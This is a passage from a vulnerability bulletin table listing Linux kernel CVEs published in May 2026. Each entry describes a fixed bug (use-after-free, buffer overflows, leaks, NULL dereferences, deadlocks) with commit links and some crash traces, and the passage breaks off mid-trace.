| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: server: fix use-after-free in smb2_open() The opinfo pointer obtained via rcu_dereference(fp->f_opinfo) is dereferenced after rcu_read_unlock(), creating a use-after-free window. | 2026-05-08 | not yet calculated | CVE-2026-43378 | https://git.kernel.org/stable/c/e1b21e6066615e7d3d3a7aa2677e415e563fd7cc https://git.kernel.org/stable/c/b720c84087cb547f23ce03eab93568c1769e4556 https://git.kernel.org/stable/c/54b48ae83de8bb06e65079d96368efe359d4909c https://git.kernel.org/stable/c/8f5b1a7cb009a93c48e9e334a2f59a660f9afc07 https://git.kernel.org/stable/c/190e5f808e8058640b408ccfed25440b441a718a https://git.kernel.org/stable/c/1e689a56173827669a35da7cb2a3c78ed5c53680 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (pmbus/q54sj108a2) fix stack overflow in debugfs read The q54sj108a2_debugfs_read function suffers from a stack buffer overflow due to incorrect arguments passed to bin2hex(). The function currently passes 'data' as the destination and 'data_char' as the source. Because bin2hex() converts each input byte into two hex characters, a 32-byte block read results in 64 bytes of output. Since 'data' is only 34 bytes (I2C_SMBUS_BLOCK_MAX + 2), this writes 30 bytes past the end of the buffer onto the stack. Additionally, the arguments were swapped: it was reading from the zero-initialized 'data_char' and writing to 'data', resulting in all-zero output regardless of the actual I2C read. Fix this by: 1. Expanding 'data_char' to 66 bytes to safely hold the hex output. 2. Correcting the bin2hex() argument order and using the actual read count. 3. Using a pointer to select the correct output buffer for the final simple_read_from_buffer call. | 2026-05-08 | not yet calculated | CVE-2026-43380 | https://git.kernel.org/stable/c/a0fc1b9c738fba231f190ab960c83202722efee5 https://git.kernel.org/stable/c/c59090c50f62a17129fc4c5407bc4071305a9e82 https://git.kernel.org/stable/c/52db5ef163c96f916d424e472fb17aadc35a9f7a https://git.kernel.org/stable/c/b48a0f8d4541a4f6651dc9a64430ce9fdf5c120b https://git.kernel.org/stable/c/73a7a345816946d276ad2c46c8bb771de67cfc46 https://git.kernel.org/stable/c/24a7b9daa103fa963b3fd37d8805b23e01621976 https://git.kernel.org/stable/c/25dd70a03b1f5f3aa71e1a5091ecd9cd2a13ee43 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nouveau/dpcd: return EBUSY for aux xfer if the device is asleep If we have runtime suspended, and userspace wants to use /dev/drm_dp_* then just tell it the device is busy instead of crashing in the GSP code. WARNING: CPU: 2 PID: 565741 at drivers/gpu/drm/nouveau/nvkm/subdev/gsp/rm/r535/rpc.c:164 r535_gsp_msgq_wait+0x9a/0xb0 [nouveau] CPU: 2 UID: 0 PID: 565741 Comm: fwupd Not tainted 6.18.10-200.fc43.x86_64 #1 PREEMPT(lazy) Hardware name: LENOVO 20QTS0PQ00/20QTS0PQ00, BIOS N2OET65W (1.52 ) 08/05/2024 RIP: 0010:r535_gsp_msgq_wait+0x9a/0xb0 [nouveau] This is a simple fix to get backported. We should probably engineer a proper power domain solution to wake up devices and keep them awake while fw updates are happening. | 2026-05-08 | not yet calculated | CVE-2026-43381 | https://git.kernel.org/stable/c/178df7c91e6c202579284df9f79d1592a514cdcf https://git.kernel.org/stable/c/4df518aa196085909fd7e32518ecd27fba60ed69 https://git.kernel.org/stable/c/cd24cab2023aa46b595bc6b9cc39d8973d9d0a8c https://git.kernel.org/stable/c/fad178ae894930520519ead3c8e0150641466360 https://git.kernel.org/stable/c/6bdd2d70c338d52c387d3b3aadc596784ae81b01 https://git.kernel.org/stable/c/ad8fa5bff53f5d1f8394f996850da8ce070eaee3 https://git.kernel.org/stable/c/24639553a016578222ac597db924dfb6fa5ec8b5 https://git.kernel.org/stable/c/8f3c6f08ababad2e3bdd239728cf66a9949446b4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: Avoid double-rtnl_lock ELP metric worker batadv_v_elp_get_throughput() might be called when the RTNL lock is already held. This could be problematic when the work queue item is cancelled via cancel_delayed_work_sync() in batadv_v_elp_iface_disable(). In this case, an rtnl_lock() would cause a deadlock. To avoid this, rtnl_trylock() was used in this function to skip the retrieval of the ethtool information in case the RTNL lock was already held. But for cfg80211 interfaces, batadv_get_real_netdev() was called - which also uses rtnl_lock(). The approach for __ethtool_get_link_ksettings() must also be used instead and the lockless version __batadv_get_real_netdev() has to be called. | 2026-05-08 | not yet calculated | CVE-2026-43382 | https://git.kernel.org/stable/c/4c3ae249431b4fcb315d7dfb4c3a13f9e443fd9b https://git.kernel.org/stable/c/192f40ad8a7dac58dae9199a065dbf7e6e67b75b https://git.kernel.org/stable/c/fa7b4edfbabdf9235b0ab4bea297fc12b3bec9ca https://git.kernel.org/stable/c/f3ca45673dab0514a887231de6f3243a699d5bfd https://git.kernel.org/stable/c/b7e5d8ddfdf1d6e9e0808d1adf7736a107372d77 https://git.kernel.org/stable/c/2ab9f2531d37775cd79228c1f5d80e6bd08d11d3 https://git.kernel.org/stable/c/77808fe7d03ad0062840b95f431869a8b3d88b24 https://git.kernel.org/stable/c/cfc83a3c71517b59c1047db57da31e26a9dc2f33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix potential out-of-bounds read in rtw_restruct_wmm_ie The current code checks 'i + 5 < in_len' at the end of the if statement. However, it accesses 'in_ie[i + 5]' before that check, which can lead to an out-of-bounds read. Move the length check to the beginning of the conditional to ensure the index is within bounds before accessing the array. | 2026-05-08 | not yet calculated | CVE-2026-43386 | https://git.kernel.org/stable/c/6ff2243d5e05a5239e39d4ba61d96b0ea3bf7259 https://git.kernel.org/stable/c/12cc6e8f8d4245b7b5a408c6fc8ab1d098d67020 https://git.kernel.org/stable/c/209644e25757c499e1c1f08c071ea0386d4448b6 https://git.kernel.org/stable/c/768f25613a9fe6766d15a4a72979657adfc1c6d8 https://git.kernel.org/stable/c/e14a1148f02e8cf1ca380d57e4b95ca36c97f45d https://git.kernel.org/stable/c/4dd2d9cf563c54e09d5f7eacf95c5b8f538b513b https://git.kernel.org/stable/c/d97fc1b29513010b60fde874c7f0ba816744e18c https://git.kernel.org/stable/c/a75281626fc8fa6dc6c9cc314ee423e8bc45203b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: properly validate the data in rtw_get_ie_ex() Just like in commit 154828bf9559 ("staging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser"), we don't trust the data in the frame so we should check the length better before acting on it. | 2026-05-08 | not yet calculated | CVE-2026-43387 | https://git.kernel.org/stable/c/ac38856092b4c994f94343251b30520bdeb7f475 https://git.kernel.org/stable/c/35969c3a208a07cb8642301df5869c34e2db7071 https://git.kernel.org/stable/c/8097a48c606a9306281ea7bd73bf2afc97553733 https://git.kernel.org/stable/c/740bca8bbdb707c0e4bb11e3316deb2f04fc7ce1 https://git.kernel.org/stable/c/821f7d759fb2de33c5e5b0c4981181c4d0c3e9b1 https://git.kernel.org/stable/c/6d62fa548387e159a21ea95132c09bfc96d336ed https://git.kernel.org/stable/c/9a4cd4c37593cc8b8d28f9a6732b490a8032006a https://git.kernel.org/stable/c/f0109b9d3e1e455429279d602f6276e34689750a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: clear walk_control on inactive context in damos_walk() damos_walk() sets ctx->walk_control to the caller-provided control structure before checking whether the context is running. If the context is inactive (damon_is_running() returns false), the function returns -EINVAL without clearing ctx->walk_control. This leaves a dangling pointer to a stack-allocated structure that will be freed when the caller returns. This is structurally identical to the bug fixed in commit f9132fbc2e83 ("mm/damon/core: remove call_control in inactive contexts") for damon_call(), which had the same pattern of linking a control object and returning an error without unlinking it. The dangling walk_control pointer can cause: 1. Use-after-free if the context is later started and kdamond dereferences ctx->walk_control (e.g., in damos_walk_cancel() which writes to control->canceled and calls complete()) 2. Permanent -EBUSY from subsequent damos_walk() calls, since the stale pointer is non-NULL Nonetheless, the real user impact is quite restrictive. The use-after-free is impossible because there are no damos_walk() callers who start the context later. The permanent -EBUSY can actually confuse users, as DAMON is not running. But the symptom is kept only while the context is turned off. Turning it on again will make DAMON internally use a newly generated damon_ctx object that doesn't have the invalid damos_walk_control pointer, so everything will work fine again. Fix this by clearing ctx->walk_control under walk_control_lock before returning -EINVAL, mirroring the fix pattern from f9132fbc2e83. | 2026-05-08 | not yet calculated | CVE-2026-43388 | https://git.kernel.org/stable/c/ce0aa47c963b8c3e5beace89e2b5a665a64b5b6b https://git.kernel.org/stable/c/9320c77134ab8d7701e20608bbf08517df4fa321 https://git.kernel.org/stable/c/d210fdcac9c0d1380eab448aebc93f602c1cd4e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: memfd_luo: always dirty all folios A dirty folio is one which has been written to. A clean folio is its opposite. Since a clean folio has no user data, it can be freed under memory pressure. memfd preservation with LUO saves the flag at preserve(). This is problematic. The folio might get dirtied later. Saving it at freeze() also doesn't work, since the dirty bit from PTE is normally synced at unmap and there might still be mappings of the file at freeze(). To see why this is a problem, say a folio is clean at preserve, but gets dirtied later. The serialized state of the folio will mark it as clean. After retrieve, the next kernel will see the folio as clean and might try to reclaim it under memory pressure. This will result in losing user data. Mark all folios of the file as dirty, and always set the MEMFD_LUO_FOLIO_DIRTY flag. This comes with the side effect of making all clean folios un-reclaimable. This is a cost that has to be paid for participants of live update. It is not expected to be a common use case to preserve a lot of clean folios anyway. Since the value of pfolio->flags is a constant now, drop the flags variable and set it directly. | 2026-05-08 | not yet calculated | CVE-2026-43389 | https://git.kernel.org/stable/c/e901c871d4b592f0042e30f3a0f031eae79744ec https://git.kernel.org/stable/c/7e04bf1f33151a30e06a65b74b5f2c19fc2be128 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nstree: tighten permission checks for listing Even privileged services should not necessarily be able to see other privileged services' namespaces so they can't leak information to each other. Use the may_see_all_namespaces() helper that centralizes this policy until the nstree adapts. | 2026-05-08 | not yet calculated | CVE-2026-43390 | https://git.kernel.org/stable/c/0abd81645fc95ec6a9d4e4813000f22c5efc0ff4 https://git.kernel.org/stable/c/8d76afe84fa2babf604b3c173730d4d2b067e361 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix starvation of scx_enable() under fair-class saturation During scx_enable(), the READY -> ENABLED task switching loop changes the calling thread's sched_class from fair to ext. Since fair has higher priority than ext, saturating fair-class workloads can indefinitely starve the enable thread, hanging the system. This was introduced when the enable path switched from preempt_disable() to scx_bypass() which doesn't protect against fair-class starvation. Note that the original preempt_disable() protection wasn't complete either - in partial switch modes, the calling thread could still be starved after preempt_enable() as it may have been switched to ext class. Fix it by offloading the enable body to a dedicated system-wide RT (SCHED_FIFO) kthread which cannot be starved by either fair or ext class tasks. scx_enable() lazily creates the kthread on first use and passes the ops pointer through a struct scx_enable_cmd containing the kthread_work, then synchronously waits for completion. The workfn runs on a different kthread from sch->helper (which runs disable_work), so it can safely flush disable_work on the error path without deadlock. | 2026-05-08 | not yet calculated | CVE-2026-43392 | https://git.kernel.org/stable/c/e0b14bf06393be137d3efb6a3b7cd5b4b9810a6b https://git.kernel.org/stable/c/c44198f25fdfecc0ec0fe366bf8a47fe17d8e229 https://git.kernel.org/stable/c/05ab9ec5dc24f234e0a2fecf3e6ff937c68f7d81 https://git.kernel.org/stable/c/b06ccbabe2506fd70b9167a644978b049150224a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix chunk map leak in btrfs_map_block() after btrfs_chunk_map_num_copies() Fix a chunk map leak in btrfs_map_block(): if we return early with -EINVAL, we're not freeing the chunk map that we've just looked up. | 2026-05-08 | not yet calculated | CVE-2026-43393 | https://git.kernel.org/stable/c/0e4aaf5a3212b6a469c2489637c29a8e2a5062a5 https://git.kernel.org/stable/c/7bdf00ed75c477252578068dba19934cd825f20a https://git.kernel.org/stable/c/4f90c5c2698383984102401b1724b0b67da832ab https://git.kernel.org/stable/c/f15fb3d41543244d1179f423da4a4832a55bc050 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: Fix cred ref leak in nfsd_nl_listener_set_doit(). nfsd_nl_listener_set_doit() uses get_current_cred() without put_cred(). As we can see from other callers, svc_xprt_create_from_sa() does not require the extra refcount. nfsd_nl_listener_set_doit() is always in the process context, sendmsg(), and current->cred does not go away. Let's use current_cred() in nfsd_nl_listener_set_doit(). | 2026-05-08 | not yet calculated | CVE-2026-43394 | https://git.kernel.org/stable/c/02e87ec0bc706cb93fa47b43d18c4d10102c7d54 https://git.kernel.org/stable/c/019debe5851d7355bea9ff0248cc317878924d8f https://git.kernel.org/stable/c/cba413765376bb466035c9160fa3130402971e2c https://git.kernel.org/stable/c/92978c83bb4eef55d02a6c990c01c423131eefa7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/sync: Cleanup partially initialized sync on parse failure xe_sync_entry_parse() can allocate references (syncobj, fence, chain fence, or user fence) before hitting a later failure path. Several of those paths returned directly, leaving partially initialized state and leaking refs. Route these error paths through a common free_sync label and call xe_sync_entry_cleanup(sync) before returning the error. (cherry picked from commit f939bdd9207a5d1fc55cced5459858480686ce22) | 2026-05-08 | not yet calculated | CVE-2026-43395 | https://git.kernel.org/stable/c/91c228f96fcfacc2341a58815b1da8c69da94ebb https://git.kernel.org/stable/c/af65cd1853599394b94201c08bed7a46717db478 https://git.kernel.org/stable/c/f0af63ffa06306f12592cd3919fad6957b425e1b https://git.kernel.org/stable/c/1bfd7575092420ba5a0b944953c95b74a5646ff8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/sync: Fix user fence leak on alloc failure When dma_fence_chain_alloc() fails, properly release the user fence reference to prevent a memory leak. (cherry picked from commit a5d5634cde48a9fcd68c8504aa07f89f175074a0) | 2026-05-08 | not yet calculated | CVE-2026-43396 | https://git.kernel.org/stable/c/05edc78eb4699e8e000a62aaa8dace50a17e19e3 https://git.kernel.org/stable/c/f8f90b33934b307f6e4599b9fae38aa1ee5441a7 https://git.kernel.org/stable/c/0879c3f04f67e2a1677c25dcc24669ce21eb6a6c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/bridge: samsung-dsim: Fix memory leak in error path In samsung_dsim_host_attach(), drm_bridge_add() is called to add the bridge. However, if samsung_dsim_register_te_irq() or pdata->host_ops->attach() fails afterwards, the function returns without removing the bridge, causing a memory leak. Fix this by adding proper error handling with goto labels to ensure drm_bridge_remove() is called in all error paths. Also ensure that samsung_dsim_unregister_te_irq() is called if the attach operation fails after the TE IRQ has been registered. The samsung_dsim_unregister_te_irq() function is moved without changes to be before samsung_dsim_host_attach() to avoid a forward declaration. | 2026-05-08 | not yet calculated | CVE-2026-43397 | https://git.kernel.org/stable/c/98310fe3a2a79671b739a5344c1a11d74c503e25 https://git.kernel.org/stable/c/0b07f7d2c5a4078c2f1c11bb36685084fe4e5c95 https://git.kernel.org/stable/c/e6d779654cda63d632bd8dfcdcabd125057e30a5 https://git.kernel.org/stable/c/a40b92fb4b26d4cb1b5e439e55a56db7e79a82d1 https://git.kernel.org/stable/c/803ec1faf7c1823e6e3b1f2aaa81be18528c9436 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: add upper bound check on user inputs in wait ioctl Huge input values in amdgpu_userq_wait_ioctl can lead to an OOM and could be exploited. So check these input values against AMDGPU_USERQ_MAX_HANDLES, which is a big enough value for genuine use cases and could potentially avoid OOM. v2: squash in Srini's fix (cherry picked from commit fcec012c664247531aed3e662f4280ff804d1476) | 2026-05-08 | not yet calculated | CVE-2026-43398 | https://git.kernel.org/stable/c/b1d10508da559da2e0ca9cca6505094a7df948e1 https://git.kernel.org/stable/c/3cd93bc695b3456f26f5ed52753d9071da26202a https://git.kernel.org/stable/c/64ac7c09fc44985ec9bb6a9db740899fa40ca613 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/userq: Fix reference leak in amdgpu_userq_wait_ioctl Drop the reference to the syncobj and timeline fence when aborting the ioctl due to the output array being too small. (cherry picked from commit 68951e9c3e6bb22396bc42ef2359751c8315dd27) | 2026-05-08 | not yet calculated | CVE-2026-43399 | https://git.kernel.org/stable/c/762f47e2b824383d5be65eee2c40a1269b7d50c8 https://git.kernel.org/stable/c/5409247d41f372bec5b141ef599f2d9f5e81b746 https://git.kernel.org/stable/c/49abfa812617a7f2d0132c70d23ac98b389c6ec1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: add upper bound check on user inputs in signal ioctl Huge input values in amdgpu_userq_signal_ioctl can lead to an OOM and could be exploited. So check these input values against AMDGPU_USERQ_MAX_HANDLES, which is a big enough value for genuine use cases and could potentially avoid OOM. (cherry picked from commit be267e15f99bc97cbe202cd556717797cdcf79a5) | 2026-05-08 | not yet calculated | CVE-2026-43400 | https://git.kernel.org/stable/c/6fff5204d8aa26b1be50b6427f833bd3e8899c4f https://git.kernel.org/stable/c/46630d966b99b0fc6cb01fef4110587f3375a0c0 https://git.kernel.org/stable/c/ea78f8c68f4f6211c557df49174c54d167821962 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: intel_pstate: Fix NULL pointer dereference in update_cpu_qos_request() The update_cpu_qos_request() function attempts to initialize the 'freq' variable by dereferencing 'cpudata' before verifying if the 'policy' is valid. This issue occurs on systems booted with the "nosmt" parameter, where all_cpu_data[cpu] is NULL for the SMT sibling threads. As a result, any call to update_qos_requests() will result in a NULL pointer dereference as the code will attempt to access pstate.turbo_freq using the NULL cpudata pointer. Also, pstate.turbo_freq may be updated by intel_pstate_get_hwp_cap() after initializing the 'freq' variable, so it is better to defer the 'freq' until intel_pstate_get_hwp_cap() has been called. Fix this by deferring the 'freq' assignment until after the policy and driver_data have been validated. [ rjw: Added one paragraph to the changelog ] | 2026-05-08 | not yet calculated | CVE-2026-43401 | https://git.kernel.org/stable/c/6bfda7ce56e7d14a677b7bcd6c7a5009cc29aa88 https://git.kernel.org/stable/c/42738dffb7b0766a45882dff7989401d78f66f92 https://git.kernel.org/stable/c/ab39cc4cb8ceecdc2b61747433e7237f1ac2b789 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: Fix a hmm_range_fault() livelock / starvation problem If hmm_range_fault() fails a folio_trylock() in do_swap_page, trying to acquire the lock of a device-private folio for migration to RAM, the function will spin until it succeeds grabbing the lock. However, if the process holding the lock is depending on a work item to be completed, which is scheduled on the same CPU as the spinning hmm_range_fault(), that work item might be starved and we end up in a livelock / starvation situation which is never resolved. This can happen, for example, if the process holding the device-private folio lock is stuck in migrate_device_unmap()->lru_add_drain_all() since lru_add_drain_all() requires a short work-item to be run on all online cpus to complete. A prerequisite for this to happen is: a) Both zone device and system memory folios are considered in migrate_device_unmap(), so that there is a reason to call lru_add_drain_all() for a system memory folio while a folio lock is held on a zone device folio. b) The zone device folio has an initial mapcount > 1 which causes at least one migration PTE entry insertion to be deferred to try_to_migrate(), which can happen after the call to lru_add_drain_all(). c) No or voluntary only preemption. This all seems pretty unlikely to happen, but indeed is hit by the "xe_exec_system_allocator" igt test. Resolve this by waiting for the folio to be unlocked if the folio_trylock() fails in do_swap_page(). Rename migration_entry_wait_on_locked() to softleaf_entry_wait_unlock() and update its documentation to indicate the new use-case. Future code improvements might consider moving the lru_add_drain_all() call in migrate_device_unmap() to be called *after* all pages have migration entries inserted. That would also eliminate b) above. v2: - Instead of a cond_resched() in hmm_range_fault(), eliminate the problem by waiting for the folio to be unlocked in do_swap_page() (Alistair Popple, Andrew Morton) v3: - Add a stub migration_entry_wait_on_locked() for the !CONFIG_MIGRATION case. (Kernel Test Robot) v4: - Rename migrate_entry_wait_on_locked() to softleaf_entry_wait_on_locked() and update docs (Alistair Popple) v5: - Add a WARN_ON_ONCE() for the !CONFIG_MIGRATION version of softleaf_entry_wait_on_locked(). - Modify wording around function names in the commit message (Andrew Morton) (cherry picked from commit a69d1ab971a624c6f112cea61536569d579c3215) | 2026-05-08 | not yet calculated | CVE-2026-43404 | https://git.kernel.org/stable/c/94b6d0ba4b640ba23bb6c708a59316e74e5ede63 https://git.kernel.org/stable/c/7e6e2fc91d4b9b12ec6e137019532568ebcf2680 https://git.kernel.org/stable/c/b570f37a2ce480be26c665345c5514686a8a0274 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kprobes: avoid crash when rmmod/insmod after ftrace killed After ftrace is killed by some errors, the kernel crashes if we remove modules that kprobe probes. BUG: unable to handle page fault for address: fffffbfff805000d PGD 817fcc067 P4D 817fcc067 PUD 817fc8067 PMD 101555067 PTE 0 Oops: Oops: 0000 [#1] SMP KASAN PTI CPU: 4 UID: 0 PID: 2012 Comm: rmmod Tainted: G W OE Tainted: [W]=WARN, [O]=OOT_MODULE, [E]=UNSIGNED_MODULE RIP: 0010:kprobes_module_callback+0x89/0x790 RSP: 0018:ffff88812e157d30 EFLAGS: 00010a02 RAX: 1ffffffff805000d RBX: dffffc0000000000 RCX: ffffffff86a8de90 RDX: ffffed1025c2af9b RSI: 0000000000000008 RDI: ffffffffc0280068 RBP: 0000000000000000 R08: 0000000000000001 R09: ffffed1025c2af9a R10: ffff88812e157cd7 R11: 205d323130325420 R12: 0000000000000002 R13: ffffffffc0290488 R14: 0000000000000002 R15: ffffffffc0280040 FS: 00007fbc450dd740(0000) GS:ffff888420331000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: fffffbfff805000d CR3: 000000010f624000 CR4: 00000000000006f0 Call Trace: <TASK> notifier_call_chain+0xc6/0x280 blocking_notifier_call_chain+0x60/0x90 __do_sys_delete_module.constprop.0+0x32a/0x4e0 do_syscall_64+0x5d/0xfa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e This is because the kprobe on ftrace does not correctly handle the kprobe_ftrace_disabled flag set by ftrace_kill(). To prevent this error, check kprobe_ftrace_disabled in __disarm_kprobe_ftrace() and skip all ftrace related operations. | 2026-05-08 | not yet calculated | CVE-2026-43409 | https://git.kernel.org/stable/c/8b6767e4141b2a42745b544d4555cf1614ba1a2d https://git.kernel.org/stable/c/b0ca81616a010807e91fc31db9be242b96326adc https://git.kernel.org/stable/c/cae928e3178c75602c21d67e21255d73e7e9ed4f https://git.kernel.org/stable/c/9edc79d664832a842012ad105b1521c1a3c35ab3 https://git.kernel.org/stable/c/e113f0b46d19626ec15388bcb91432c9a4fd6261 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: stratix10-rsu: Fix NULL pointer dereference when RSU is disabled When the Remote System Update (RSU) isn't enabled in the First Stage Boot Loader (FSBL), the driver encounters a NULL pointer dereference when executing the svc_normal_to_secure_thread() thread, resulting in a kernel panic: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 Mem abort info: ... Data abort info: ... [0000000000000008] user address but active_mm is swapper Internal error: Oops: 0000000096000004 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 79 Comm: svc_smc_hvc_thr Not tainted 6.19.0-rc8-yocto-standard+ #59 PREEMPT Hardware name: SoCFPGA Stratix 10 SoCDK (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : svc_normal_to_secure_thread+0x38c/0x990 lr : svc_normal_to_secure_thread+0x144/0x990 ... Call trace: svc_normal_to_secure_thread+0x38c/0x990 (P) kthread+0x150/0x210 ret_from_fork+0x10/0x20 Code: 97cfc113 f9400260 aa1403e1 f9400400 (f9400402) ---[ end trace 0000000000000000 ]--- The issue occurs because rsu_send_async_msg() fails when RSU is not enabled in firmware, causing the channel to be freed via stratix10_svc_free_channel(). However, the probe function continues execution and registers svc_normal_to_secure_thread(), which subsequently attempts to access the already-freed channel, triggering the NULL pointer dereference. Fix this by properly cleaning up the async client and returning early on failure, preventing the thread from being used with an invalid channel. | 2026-05-08 | not yet calculated | CVE-2026-43410 | https://git.kernel.org/stable/c/aa5739e0c51ad01c6e763ca89c1bfb58fc6ea71a https://git.kernel.org/stable/c/c45f7263100cece247dd3fa5fe277bd97fdb5687 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tipc: fix divide-by-zero in tipc_sk_filter_connect() A user can set conn_timeout to any value via setsockopt(TIPC_CONN_TIMEOUT), including values less than 4. When a SYN is rejected with TIPC_ERR_OVERLOAD and the retry path in tipc_sk_filter_connect() executes: delay %= (tsk->conn_timeout / 4); If conn_timeout is in the range [0, 3], the integer division yields 0, and the modulo operation triggers a divide-by-zero exception, causing a kernel oops/panic. Fix this by clamping conn_timeout to a minimum of 4 at the point of use in tipc_sk_filter_connect(). Oops: divide error: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 119 Comm: poc-F144 Not tainted 7.0.0-rc2+ RIP: 0010:tipc_sk_filter_rcv (net/tipc/socket.c:2236 net/tipc/socket.c:2362) Call Trace: tipc_sk_backlog_rcv (include/linux/instrumented.h:82 include/linux/atomic/atomic-instrumented.h:32 include/net/sock.h:2357 net/tipc/socket.c:2406) __release_sock (include/net/sock.h:1185 net/core/sock.c:3213) release_sock (net/core/sock.c:3797) tipc_connect (net/tipc/socket.c:2570) __sys_connect (include/linux/file.h:62 include/linux/file.h:83 net/socket.c:2098) | 2026-05-08 | not yet calculated | CVE-2026-43411 | https://git.kernel.org/stable/c/600feb0a66a98c6b7f6f02b5f3612e75f9b8540f https://git.kernel.org/stable/c/3bc9998041076ee05d3f312a22cee6b2ca35527f https://git.kernel.org/stable/c/579956f9f297eb1b6a5d24de313f3acccee1f9d5 https://git.kernel.org/stable/c/a360d3815aae1f00dd71b7714a846482e85cc1f7 https://git.kernel.org/stable/c/c2ebfbe63deb7bfd4dc2532bae62a7ed67713272 https://git.kernel.org/stable/c/2754e7b3d64748643df867d1ea6fec522914b635 https://git.kernel.org/stable/c/338c5edeb6ae3f12a4b84dff9d71f6f7f8c202c3 https://git.kernel.org/stable/c/6c5a9baa15de240e747263aba435a0951da8d8d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: qdsp6: Fix q6apm remove ordering during ADSP stop and start During ADSP stop and start, the kernel crashes due to the order in which ASoC components are removed. On ADSP stop, the q6apm-audio .remove callback unloads topology and removes PCM runtimes during ASoC teardown. This deletes the RTDs that contain the q6apm DAI components before their removal pass runs, leaving those components still linked to the card and causing crashes on the next rebind. Fix this by ensuring that all dependent (child) components are removed first, and the q6apm component is removed last. [ 48.105720] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000d0 [ 48.114763] Mem abort info: [ 48.117650] ESR = 0x0000000096000004 [ 48.121526] EC = 0x25: DABT (current EL), IL = 32 bits [ 48.127010] SET = 0, FnV = 0 [ 48.130172] EA = 0, S1PTW = 0 [ 48.133415] FSC = 0x04: level 0 translation fault [ 48.138446] Data abort info: [ 48.141422] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 48.147079] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 48.152354] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 48.157859] user pgtable: 4k pages, 48-bit VAs, pgdp=00000001173cf000 [ 48.164517] [00000000000000d0] pgd=0000000000000000, p4d=0000000000000000 [ 48.171530] Internal error: Oops: 0000000096000004 [#1] SMP [ 48.177348] Modules linked in: q6prm_clocks q6apm_lpass_dais q6apm_dai snd_q6dsp_common q6prm snd_q6apm 8021q garp mrp stp llc snd_soc_hdmi_codec apr pdr_interface phy_qcom_edp fastrpc qcom_pd_mapper rpmsg_ctrl qrtr_smd rpmsg_char qcom_pdr_msg qcom_iris v4l2_mem2mem videobuf2_dma_contig ath11k_pci msm ubwc_config at24 ath11k videobuf2_memops mac80211 ocmem videobuf2_v4l2 libarc4 drm_gpuvm mhi qrtr videodev drm_exec snd_soc_sc8280xp gpu_sched videobuf2_common nvmem_qcom_spmi_sdam snd_soc_qcom_sdw drm_dp_aux_bus qcom_q6v5_pas qcom_spmi_temp_alarm snd_soc_qcom_common rtc_pm8xxx qcom_pon drm_display_helper cec qcom_pil_info qcom_stats soundwire_bus drm_client_lib mc dispcc0_sa8775p videocc_sa8775p qcom_q6v5 camcc_sa8775p snd_soc_dmic phy_qcom_sgmii_eth snd_soc_max98357a i2c_qcom_geni snd_soc_core dwmac_qcom_ethqos llcc_qcom icc_bwmon qcom_sysmon snd_compress qcom_refgen_regulator coresight_stm stmmac_platform snd_pcm_dmaengine qcom_common coresight_tmc stmmac coresight_replicator qcom_glink_smem coresight_cti stm_core [ 48.177444] coresight_funnel snd_pcm ufs_qcom phy_qcom_qmp_usb gpi phy_qcom_snps_femto_v2 coresight phy_qcom_qmp_ufs qcom_wdt gpucc_sa8775p pcs_xpcs mdt_loader qcom_ice icc_osm_l3 qmi_helpers snd_timer snd soundcore display_connector qcom_rng nvmem_reboot_mode drm_kms_helper phy_qcom_qmp_pcie sha256 cfg80211 rfkill socinfo fuse drm backlight ipv6 [ 48.301059] CPU: 2 UID: 0 PID: 293 Comm: kworker/u32:2 Not tainted 6.19.0-rc6-dirty #10 PREEMPT [ 48.310081] Hardware name: Qualcomm Technologies, Inc. Lemans EVK (DT) [ 48.316782] Workqueue: pdr_notifier_wq pdr_notifier_work [pdr_interface] [ 48.323672] pstate: 20400005 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 48.330825] pc : mutex_lock+0xc/0x54 [ 48.334514] lr : soc_dapm_shutdown_dapm+0x44/0x174 [snd_soc_core] [ 48.340794] sp : ffff800084ddb7b0 [ 48.344207] x29: ffff800084ddb7b0 x28: ffff00009cd9cf30 x27: ffff00009cd9cc00 [ 48.351544] x26: ffff000099610190 x25: ffffa31d2f19c810 x24: ffffa31d2f185098 [ 48.358869] x23: ffff800084ddb7f8 x22: 0000000000000000 x21: 